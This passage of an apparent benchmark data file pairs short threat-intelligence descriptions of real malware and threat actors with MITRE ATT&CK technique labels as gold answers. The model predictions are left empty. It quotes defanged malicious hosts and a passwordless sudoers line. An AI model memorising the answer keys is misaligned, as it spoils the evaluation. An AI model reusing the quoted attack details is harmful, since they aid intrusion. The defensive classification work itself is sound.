getmac and domain configuration with net config workstation.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1592.003\n- Text: Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "Kimsuky has used `ipconfig/all` to gather network configuration information.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ferocious has the ability to use Visual Basic scripts for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Evilnum has used malicious JavaScript files on the victim's machine.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: SDBbot has the ability to download a DLL from C2 to a compromised host.\n\t - T1105: Ingress Tool Transfer\n", + "input": "Frankenstein has used CVE-2017-11882 to execute code on the victim's machine.", + "gold": "- T1203: Exploitation for Client Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Diavol can use the ARP table to find remote hosts to scan.\n\t - T1018: Remote System Discovery\n- Text: Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.\n\t - T1205.002: Traffic Signaling - Socket Filters\n", + "input": "Remsec can ping or traceroute a remote host.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike uses a command-line interface to interact with systems.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments\n\t - T1047: Windows Management Instrumentation\n", + "input": "PLAINTEE uses cmd.exe to execute commands on the victim\u2019s machine.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TeamTNT has scanned specific lists of target IP addresses.\n\t - T1595.001: Active Scanning - Scanning IP Blocks\n- Text: No matching sample found for T1557.002\n- Text: Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.\n\t - T1018: Remote System Discovery\n", + "input": "NBTscan can be used to collect MAC addresses.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RDAT has created a service when it is installed on the victim machine.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: MiniDuke can download additional encrypted backdoors onto the victim via GIF files.\n\t - T1105: Ingress Tool Transfer\n- Text: During Operation Honeybee, threat actors ran \"sc start\" to start the COMSysApp as part of the service hijacking and \"sc stop\" to stop and reconfigure the COMSysApp.\n\t - T1569.002: System Services - Service Execution\n", + "input": "ZeroT can add a new service to ensure PlugX persists on the system when delivered as another payload onto the system.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [1] For information on vulnerabilities known to be exploited by Chinese statesponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed: \uf0b7 Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae ) and plant webshells. \uf0b7 Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources. \uf0b7 Deploying a public proof of concept (POC) exploit targeting a publicfacing appliance vulnerability.\n\t - T1190: Exploit Public-Facing Application\n- Text: The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "DLL side-loading has been used to execute BBSRAT through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with BBSRAT by the dropper.", + "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Torisma has used various Windows API calls.\n\t - T1106: Native API\n- Text: Another infamous banker Trojan, Kronos, caught up with Edge in 2016. We checked out its capabilities on a Windows 10 virtual machine. In the code of the new Kronos version we found a function that checks the name and checksum of a process, as well as the hashes of the functions hooked by the malware.\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2\n\t - T1129: Shared Modules\n", + "input": "KONNI has hardcoded API calls within its functions to use on the victim's machine.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QUADAGENT used the PowerShell filenames \"Office365DCOMCheck.ps1\" and \"SystemDiskClean.ps1\".\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. Mandiant identified a utility script named kill.bat that was run on systems in the environment. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc. Domain administrators have complete control over Windows systems in an Active Directory environment\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d\n\t - T1036: Masquerading\n", + "input": "The Remsec loader implements itself with the name Security Support Provider, a legitimate Windows function. Various Remsec .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. Remsec also disguised malicious modules using similar filenames as custom network encryption software on victims.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot has been delivered via malicious links in phishing e-mails.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware \u2014 threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. This repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it may be considered a high value target. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Machete has sent phishing emails that contain a link to an external server with ZIP and RAR archives.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has used batch scripts and the command-line interface for execution.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Hildegard was executed through the kubelet API run command and by executing commands on running containers.\n\t - T1609: Container Administration Command\n- Text: Dok adds \"admin ALL=(ALL) NOPASSWD: ALL\" to the \"/etc/sudoers\" file.\n\t - T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching\n", + "input": "Spark can use cmd.exe to run commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: iKitten will zip up the /Library/Keychains directory before exfiltrating it.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: PowerLess can encrypt browser database files prior to exfiltration.\n\t - T1560: Archive Collected Data\n- Text: Gelsemium can compress embedded executables with the zlib library.\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "Gallmaker has used WinZip, likely to archive data prior to exfiltration.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KOCTOPUS has been distributed via spearphishing emails with malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: TA551 has prompted users to enable macros within spearphishing attachments to install malware.\n\t - T1204.002: User Execution - Malicious File\n- Text: Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "WarzoneRAT has been distributed as a malicious attachment within an email.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sliver can encode binary data into a .PNG file for C2 communication.\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. Here is an example decoy document: The purpose of the VisualBasic script is to execute the payload. Although the malicious part of the binary is only 2MB, the final file is more than 120MB in size, padded out with random data. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019\n\t - T1036: Masquerading\n- Text: APT-C-36 has disguised its scheduled tasks as those used by Google.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "SUNBURST C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.", + "gold": "- T1001.002: Data Obfuscation - Steganography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Calisto uses the \"zip -r\" command to compress the data collected on the local system.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.\n\t - T1560: Archive Collected Data\n", + "input": "Operation Wocao has archived collected files with WinRAR, prior to exfiltration.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be used to discover local NetBIOS domain names.\n\t - T1016: System Network Configuration Discovery\n- Text: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: HAFNIUM has stolen copies of the Active Directory database (NTDS.DIT).\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious\n\t - T1057: Process Discovery\n- Text: can list running services.\n\t - T1007: System Service Discovery\n- Text: Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\".\n\t - T1049: System Network Connections Discovery\n", + "input": "Volgmer can gather a list of processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One of the discovered config files contained a URL with an as yet unidentified md5: hxxps://46.165.222(dot)28/upgrade/bf0dac805798cc1f633f19ce8ed6382f/upgrade.php Victim set #4 A set of victims discovered installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy\n\t - T1105: Ingress Tool Transfer\n- Text: (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us tracking documents from the same author, as shown in Figure 6\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "VaporRage has the ability to download malicious shellcode to compromised systems.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).\n\t - T1114.001: Email Collection - Local Email Collection\n- Text: ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.\n\t - T1204.001: User Execution - Malicious Link\n- Text: QAKBOT has spread through emails with newly created malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Out1 can parse e-mails on a target machine.", + "gold": "- T1114.001: Email Collection - Local Email Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Command ID 17 indexes to a function that collects the system information and sends it to the C2 server.\n\t - T1033: System Owner/User Discovery\n- Text: menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim\u2019s username.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can scan for open ports on a compromised machine.\n\t - T1046: Network Service Discovery\n- Text: likely obtained a list of hosts in the victim environment.\n\t - T1018: Remote System Discovery\n- Text: Conti can enumerate routine network connections from a compromised host.\n\t - T1049: System Network Connections Discovery\n", + "input": "menuPass has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrongPity has been bundled with legitimate software installation files for disguise.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: tools attempt to spoof anti-virus processes as a means of self-defense.\n\t - T1036: Masquerading\n", + "input": "KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.\n\t - T1027: Obfuscated Files or Information\n- Text: Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding. Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon initial execution, the Windows Registry is checked to determine if DarkWatchman has already been installed. The malware stores its configuration in \u2018\\\\HKCU\\Software\\Microsoft\\Windows\\DWM\\\u2018, using registry keys that consist of a uid generated from the serial number of the C: drive and appended with a single digit or character. Installation is denoted by uid + 0 (eg: abc1230) \u2013 if the malware does not find a \u20181\u2018 flag in this key, it runs its install function\n\t - T1012: Query Registry\n- Text: Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS. The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\", \"VMWARE\" or \"VirtualBox\". The fourth technique checks the Processor ID of the system. The WMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real machine. The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine. The variant version of GX is used in the URI\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "POWRUNER may query the Registry by running \"reg query\" on a victim.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.\n\t - T1098: Account Manipulation\n- Text: JPIN can obtain the permissions of the victim user.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.\n\t - T1114.003: Email Collection - Email Forwarding Rule\n", + "input": "Dragonfly has added newly created accounts to the administrators group to maintain elevated access.", + "gold": "- T1098: 